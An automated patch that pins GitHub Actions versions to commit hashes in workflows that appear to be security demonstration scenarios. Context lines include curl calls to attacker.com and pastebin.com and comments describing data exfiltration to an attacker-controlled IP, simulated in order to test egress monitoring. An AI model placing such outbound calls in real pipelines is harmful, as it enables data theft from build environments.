From 67c4e39ad05f6efcd5ffb0e9bfaa408a0ea8951b Mon Sep 17 00:00:00 2001
From: StepSecurity Bot <bot@stepsecurity.io>
Date: Wed, 17 Jul 2024 01:15:06 +0000
Subject: [PATCH] [StepSecurity] ci: Harden GitHub Actions

Signed-off-by: StepSecurity Bot <bot@stepsecurity.io>
---
 .github/workflows/anomalous-outbound-calls.yaml              | 2 +-
 .github/workflows/arc-secure-by-default.yml                  | 4 ++--
 .github/workflows/changed-files-vulnerability-without-hr.yml | 4 ++--
 .github/workflows/unexpected-outbound-calls.yml              | 2 +-
 4 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml
index 2e87a976..ebb008a1 100644
--- a/.github/workflows/anomalous-outbound-calls.yaml
+++ b/.github/workflows/anomalous-outbound-calls.yaml
@@ -7,7 +7,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Harden Runner
-        uses: step-security/harden-runner@v2
+        uses: step-security/harden-runner@17d0e2bd7d51742c71671bd19fa12bdc9d40a3d6 # v2.8.1
         with:
           egress-policy: audit
       - run: "curl https://pastebin.com -L  || true"
diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml
index 96a7098d..27adddf1 100644
--- a/.github/workflows/arc-secure-by-default.yml
+++ b/.github/workflows/arc-secure-by-default.yml
@@ -6,7 +6,7 @@ jobs:
   direct-ip-hosted:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
 
       # Codecov Scenario: Exfiltrate data to attacker's IP address
       - name: Data Exfiltration To Attacker Controlled IP address
@@ -14,7 +14,7 @@ jobs:
   direct-ip-arc:
     runs-on: self-hosted
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0
 
       # Codecov Scenario: Exfiltrate data to attacker's IP address
       - name: Data Exfiltration To Attacker Controlled IP address
diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml
index 4b74464f..ce8aca55 100644
--- a/.github/workflows/changed-files-vulnerability-without-hr.yml
+++ b/.github/workflows/changed-files-vulnerability-without-hr.yml
@@ -14,14 +14,14 @@ jobs:
     runs-on: ubuntu-latest
     name: Test changed-files
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4.1.7
         with:
           fetch-depth: 0
 
       # Example 1
       - name: Get changed files
         id: changed-files
-        uses: tj-actions/changed-files@v40
+        uses: tj-actions/changed-files@56284d80811fb5963a972b438f2870f175e5b7c8 # v40.2.3
 
       - name: List all changed files
         run: |
diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml
index f5316797..7e8c7429 100644
--- a/.github/workflows/unexpected-outbound-calls.yml
+++ b/.github/workflows/unexpected-outbound-calls.yml
@@ -7,7 +7,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Harden Runner
-        uses: step-security/harden-runner@v2
+        uses: step-security/harden-runner@17d0e2bd7d51742c71671bd19fa12bdc9d40a3d6 # v2.8.1
         with:
           egress-policy: audit
       - run: "curl https://attacker.com -L  || true"